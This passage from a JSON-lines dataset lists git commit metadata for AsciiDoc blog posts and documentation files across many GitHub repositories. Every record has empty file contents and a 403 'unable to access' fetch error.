Story","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-06-12-PS4-vs-Xbox-One-The-Full-Story.adoc","new_file":"_posts\/2013-06-12-PS4-vs-Xbox-One-The-Full-Story.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9baa2a08e12a8b918c22268f05fb564ad98c5ca8","subject":"add clojutre","message":"add clojutre\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2016\/clojutre.adoc","new_file":"content\/events\/2016\/clojutre.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"05141bfe3310cd5c23d9fb7989199862570cf0e8","subject":"y2b create post NEW OFFICE TOUR","message":"y2b create post NEW OFFICE TOUR","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-11-09-NEW-OFFICE-TOUR.adoc","new_file":"_posts\/2014-11-09-NEW-OFFICE-TOUR.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dd20c52c00cfff54331c404fcf961ef036335cc3","subject":"Update 2016-09-18-Bionics-Cyborgs.adoc","message":"Update 2016-09-18-Bionics-Cyborgs.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-09-18-Bionics-Cyborgs.adoc","new_file":"_posts\/2016-09-18-Bionics-Cyborgs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"497161cbee0dabe0d12af5ca11a3f4f41468b5da","subject":"Update 2016-12-01-Exploit-sur-Tor.adoc","message":"Update 2016-12-01-Exploit-sur-Tor.adoc","repos":"Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io","old_file":"_posts\/2016-12-01-Exploit-sur-Tor.adoc","new_file":"_posts\/2016-12-01-Exploit-sur-Tor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mediashare\/Mediashare.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff1d263aa9e96c11525a1227fca039c1d5f8a7ab","subject":"Update 2015-06-05-Es-ist-die-Donutwelt.adoc","message":"Update 2015-06-05-Es-ist-die-Donutwelt.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-06-05-Es-ist-die-Donutwelt.adoc","new_file":"_posts\/2015-06-05-Es-ist-die-Donutwelt.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1bc02211b9f6d87dc10e7421490e64263d2750f5","subject":"Update 2016-09-10-Caught-In-The-Middle.adoc","message":"Update 2016-09-10-Caught-In-The-Middle.adoc","repos":"gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io","old_file":"_posts\/2016-09-10-Caught-In-The-Middle.adoc","new_file":"_posts\/2016-09-10-Caught-In-The-Middle.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gudhakesa\/gudhakesa.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ed5858ce12b346fece70151a2e05b8f960fa44ad","subject":"Update 2018-07-30-Facebook-A-P-Iver311.adoc","message":"Update 2018-07-30-Facebook-A-P-Iver311.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-30-Facebook-A-P-Iver311.adoc","new_file":"_posts\/2018-07-30-Facebook-A-P-Iver311.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aafae908f4c98e7a5e35e04a208ebda4bdbc5c62","subject":"Update 2018-04-13-deploy-by-kubernetes.adoc","message":"Update 2018-04-13-deploy-by-kubernetes.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-04-13-deploy-by-kubernetes.adoc","new_file":"_posts\/2018-04-13-deploy-by-kubernetes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"009dea0fe26f198fd203f2a88be38748acdff01c","subject":"Publish 2093-1-1-Puzzle-8-M-A-T-R-I-X.adoc","message":"Publish 2093-1-1-Puzzle-8-M-A-T-R-I-X.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"2093-1-1-Puzzle-8-M-A-T-R-I-X.adoc","new_file":"2093-1-1-Puzzle-8-M-A-T-R-I-X.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4639e4316df7f8ddd83fc2df8922c1bd6a5107aa","subject":"y2b create post $8000 Robot Unboxing!","message":"y2b create post $8000 Robot Unboxing!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-05-22-8000-Robot-Unboxing.adoc","new_file":"_posts\/2015-05-22-8000-Robot-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5c650fb09be0115e485ed7d3adf481dc94790b4c","subject":"Update 2018-11-27-Laravel-Nexmo-S-M-S.adoc","message":"Update 2018-11-27-Laravel-Nexmo-S-M-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-27-Laravel-Nexmo-S-M-S.adoc","new_file":"_posts\/2018-11-27-Laravel-Nexmo-S-M-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"11a6a16b7fdb6139e258ebcdccce236b143e77b8","subject":"Update 2016-07-22-Stable-Graph-Matching.adoc","message":"Update 2016-07-22-Stable-Graph-Matching.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b4a65cde2d6590b95675939f740b8c5138d4dad4","subject":"Create 2015-2-11-Just-a-Test.asciidoc","message":"Create 2015-2-11-Just-a-Test.asciidoc","repos":"rdmueller\/rdmueller.github.io,rdmueller\/rdmueller.github.io,rdmueller\/rdmueller.github.io","old_file":"_posts\/2015-2-11-Just-a-Test.asciidoc","new_file":"_posts\/2015-2-11-Just-a-Test.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rdmueller\/rdmueller.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f22c47a47eef3cde872fb60ef4f9b61cc739e310","subject":"Update 2017-08-08-hello-hubpress.adoc","message":"Update 2017-08-08-hello-hubpress.adoc","repos":"adjiebpratama\/press,adjiebpratama\/press,adjiebpratama\/press,adjiebpratama\/press","old_file":"_posts\/2017-08-08-hello-hubpress.adoc","new_file":"_posts\/2017-08-08-hello-hubpress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adjiebpratama\/press.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"97526a840bad7d44ba61c01d9d8f82d474a6df28","subject":"Update 2018-09-24-Time-for-Class.adoc","message":"Update 2018-09-24-Time-for-Class.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-24-Time-for-Class.adoc","new_file":"_posts\/2018-09-24-Time-for-Class.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"842e2fc28c427f15f51fdb58d18837bb1a901ad9","subject":"y2b create post ASTRO Gaming A50 Wireless Headset Unboxing (PS3, Xbox 360, PC Gaming Headset)","message":"y2b create post ASTRO Gaming A50 Wireless Headset Unboxing (PS3, Xbox 360, PC Gaming Headset)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-12-17-ASTRO-Gaming-A50-Wireless-Headset-Unboxing-PS3-Xbox-360-PC-Gaming-Headset.adoc","new_file":"_posts\/2012-12-17-ASTRO-Gaming-A50-Wireless-Headset-Unboxing-PS3-Xbox-360-PC-Gaming-Headset.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4b7373c456e1ba918b401e4dfaac75b0dffa78ff","subject":"Update 2015-11-29-This-is-a-post.adoc","message":"Update 2015-11-29-This-is-a-post.adoc","repos":"BenBals\/hubpress,BenBals\/hubpress,BenBals\/hubpress","old_file":"_posts\/2015-11-29-This-is-a-post.adoc","new_file":"_posts\/2015-11-29-This-is-a-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/BenBals\/hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b758c00771978a1a49ab4adfa999177a61a2b723","subject":"Renamed '_posts\/2017-10-18-Blog-Title.adoc' to '_posts\/2017-10-18-Hello-World.adoc'","message":"Renamed '_posts\/2017-10-18-Blog-Title.adoc' to '_posts\/2017-10-18-Hello-World.adoc'","repos":"chrizco\/chrizco.github.io,chrizco\/chrizco.github.io,chrizco\/chrizco.github.io,chrizco\/chrizco.github.io","old_file":"_posts\/2017-10-18-Hello-World.adoc","new_file":"_posts\/2017-10-18-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chrizco\/chrizco.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bb5ab1f4be3c3b587f6b689637b683b08e8ac327","subject":"Update 2016-01-04-JavaScript-Beginner.adoc","message":"Update 2016-01-04-JavaScript-Beginner.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2016-01-04-JavaScript-Beginner.adoc","new_file":"_posts\/2016-01-04-JavaScript-Beginner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f8d44ad985fd2cf420d598409e919abd2e611be4","subject":"Update 2019-02-04-Google-Spread-Sheet.adoc","message":"Update 2019-02-04-Google-Spread-Sheet.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-04-Google-Spread-Sheet.adoc","new_file":"_posts\/2019-02-04-Google-Spread-Sheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f96c405801dfd5f8ebd2c60d01564459d245f899","subject":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","message":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","repos":"patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io","old_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/patricekrakow\/patricekrakow.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a5ce9cf92c8bea14bdcb462b7c119638ff2fa8b5","subject":"odoo-addons\/sirail#3168 ajout documentation","message":"odoo-addons\/sirail#3168 ajout documentation\n","repos":"ndp-systemes\/odoo-addons,ndp-systemes\/odoo-addons,ndp-systemes\/odoo-addons","old_file":"ndp_migration\/documentation.adoc","new_file":"ndp_migration\/documentation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ndp-systemes\/odoo-addons.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"6b662135b736ca7fe48582f87d8a5555ac8e17fe","subject":"Adding index file for the tutorial in the docsite","message":"Adding index file for the tutorial in the docsite\n","repos":"platosha\/angular-polymer,vaadin\/angular2-polymer,vaadin\/angular2-polymer,platosha\/angular-polymer,platosha\/angular-polymer","old_file":"docs\/tutorial-index.adoc","new_file":"docs\/tutorial-index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vaadin\/angular2-polymer.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ec77563222b7812a09d0f2e5ec00a7328e763c16","subject":"Added Forge 2.12.3.Final announcement","message":"Added Forge 2.12.3.Final announcement\n","repos":"forge\/docs,forge\/docs,luiz158\/docs,addonis1990\/docs,agoncal\/docs,agoncal\/docs,luiz158\/docs,addonis1990\/docs","old_file":"news\/2014-12-01-forge-2.12.3.final.asciidoc","new_file":"news\/2014-12-01-forge-2.12.3.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/addonis1990\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"9a63da84308937684086a03f37005797a2b54b90","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2021\/08\/20\/deref.adoc","new_file":"content\/news\/2021\/08\/20\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"8d7b179b69801d762d793293f1587b88027481e0","subject":"Add clustering docs","message":"Add clustering docs\n","repos":"gentics\/mesh,gentics\/mesh,gentics\/mesh,gentics\/mesh","old_file":"doc\/src\/main\/docs\/clustering.asciidoc","new_file":"doc\/src\/main\/docs\/clustering.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gentics\/mesh.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f10790fd9c06587e1ee9264f8c69853ec488ae54","subject":"Update 2016-04-03-etat-limite-borderline-tpl.adoc","message":"Update 2016-04-03-etat-limite-borderline-tpl.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-04-03-etat-limite-borderline-tpl.adoc","new_file":"_posts\/2016-04-03-etat-limite-borderline-tpl.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a4cc1767f4a84a07f59ee53557e37d1b7fdf3f38","subject":"Update 2018-12-10-Im-Wahnsinn-der-Bibliothek.adoc","message":"Update 2018-12-10-Im-Wahnsinn-der-Bibliothek.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2018-12-10-Im-Wahnsinn-der-Bibliothek.adoc","new_file":"_posts\/2018-12-10-Im-Wahnsinn-der-Bibliothek.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aafd4e466425701e48ffa991011cc910535d17aa","subject":"Renamed '_posts\/2017-10-15-Find-your-HOME.adoc' to '_posts\/2019-01-31-Find-your-HOME.adoc'","message":"Renamed '_posts\/2017-10-15-Find-your-HOME.adoc' to '_posts\/2019-01-31-Find-your-HOME.adoc'","repos":"sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io","old_file":"_posts\/2019-01-31-Find-your-HOME.adoc","new_file":"_posts\/2019-01-31-Find-your-HOME.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sebasmonia\/sebasmonia.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eb4965f07045f0daea9ec620e89f6b74ad4f831f","subject":"Update 2016-07-29-My-Zimbabwean-Queen.adoc","message":"Update 2016-07-29-My-Zimbabwean-Queen.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2016-07-29-My-Zimbabwean-Queen.adoc","new_file":"_posts\/2016-07-29-My-Zimbabwean-Queen.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f347a44c7232f964947f6b838d28267b64b385c0","subject":"Update 2019-02-14-Google-Spread-Sheet.adoc","message":"Update 2019-02-14-Google-Spread-Sheet.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-14-Google-Spread-Sheet.adoc","new_file":"_posts\/2019-02-14-Google-Spread-Sheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7a52c4bd451a7e04121898ae56648378e8b674ca","subject":"edits in blog Hazelcast for Mongo","message":"edits in blog Hazelcast for Mongo\n","repos":"gAmUssA\/hazelcast-mongo-experiments","old_file":"Hazelcast For MongoDB users.adoc","new_file":"Hazelcast For MongoDB users.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gAmUssA\/hazelcast-mongo-experiments.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b94ff6648cc93b45ef5b5780e7323dc1393bdace","subject":"new post: colours in django model","message":"new post: colours in django model\n","repos":"daemotron\/daemotron.github.io,daemotron\/daemotron.github.io,daemotron\/daemotron.github.io,daemotron\/daemotron.github.io","old_file":"_posts\/2017-11-08-Colous-in-Django-Model.adoc","new_file":"_posts\/2017-11-08-Colous-in-Django-Model.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/daemotron\/daemotron.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"867f29eaa197e0df2522046cd69e83c661026737","subject":"Update 2015-05-20-Post-test.adoc","message":"Update 2015-05-20-Post-test.adoc","repos":"jankolorenc\/jankolorenc.github.io,jankolorenc\/jankolorenc.github.io,jankolorenc\/jankolorenc.github.io","old_file":"_posts\/2015-05-20-Post-test.adoc","new_file":"_posts\/2015-05-20-Post-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jankolorenc\/jankolorenc.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0c0a1e5ad07f39259c6ed8498c3a71d8e5a883bf","subject":"Update 2018-08-30-Exception.adoc","message":"Update 2018-08-30-Exception.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-30-Exception.adoc","new_file":"_posts\/2018-08-30-Exception.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"025e9b0fd546cd942064d5e1889624f2698c6f04","subject":"Fix documentation","message":"Fix documentation\n","repos":"qarea\/jirams,qarea\/planningms,qarea\/planningms,qarea\/jirams","old_file":"doc\/narada-tgms-base.adoc","new_file":"doc\/narada-tgms-base.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/qarea\/jirams.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3c0b776d76d26b8deb81a9e04a651e9e2e9bf9e6","subject":"Grant db user osis the right to create db","message":"Grant db user osis the right to create db\n\nIt is necessary to execute the tests.","repos":"uclouvain\/OSIS-Louvain,uclouvain\/osis_louvain,uclouvain\/osis_louvain,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/osis,uclouvain\/osis,uclouvain\/osis_louvain,uclouvain\/OSIS-Louvain","old_file":"doc\/technical-manual.adoc","new_file":"doc\/technical-manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"b353741a39a1b0806269eb3a6e540b104c69f408","subject":"Update 2015-06-13-Nachalo.adoc","message":"Update 2015-06-13-Nachalo.adoc","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2015-06-13-Nachalo.adoc","new_file":"_posts\/2015-06-13-Nachalo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c486526c648235ce2c8238e04c6b5a6a729b3fec","subject":"Delete 2015-08-06-TO-DELE.adoc","message":"Delete 2015-08-06-TO-DELE.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-08-06-TO-DELE.adoc","new_file":"_posts\/2015-08-06-TO-DELE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8b7fa5c0f5973d05ae74b56cf0bea38bc4dd5473","subject":"Update 2017-06-11-vimmer1.adoc","message":"Update 2017-06-11-vimmer1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-11-vimmer1.adoc","new_file":"_posts\/2017-06-11-vimmer1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"73bd67d19d5805e3e05e3fc821b9bab4a77e88b7","subject":"Update 2018-05-15-signals.adoc","message":"Update 2018-05-15-signals.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2018-05-15-signals.adoc","new_file":"_posts\/2018-05-15-signals.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3257487c6d047bc1ecca4bfdf78167e00e9d00f4","subject":"Don't bold","message":"Don't bold\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"dc43227cd8a8260783fafd593ae2d7095d6bf4ba","subject":"Add bitwise operations","message":"Add bitwise operations\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"5f214b2030dcb3baf1a610f273ae573b5692c40c","subject":"CL: build executable with xach's buildapp","message":"CL: build executable with xach's buildapp\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"1b30c601aaac56f0393178a9799bd377fc8e33bc","subject":"[doc] updated release notes for Kudu C++ client","message":"[doc] updated release notes for Kudu C++ client\n\nChange-Id: If4667dc7bb90fdf910c06a9107ce41f1ac3d7037\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/5006\nReviewed-by: Adar Dembo <866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\nTested-by: Kudu Jenkins\n","repos":"cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu","old_file":"docs\/release_notes.adoc","new_file":"docs\/release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5b0dfeefdcbb40c895d2a5ee3c0e681a2f9f924b","subject":"add coc","message":"add coc\n\nSigned-off-by: Sebastian Ho\u00df <1d6e1cf70ec6f9ab28d3ea4b27a49a77654d370e@shoss.de>","repos":"sebhoss\/memoization.java","old_file":"CODE_OF_CONDUCT.asciidoc","new_file":"CODE_OF_CONDUCT.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 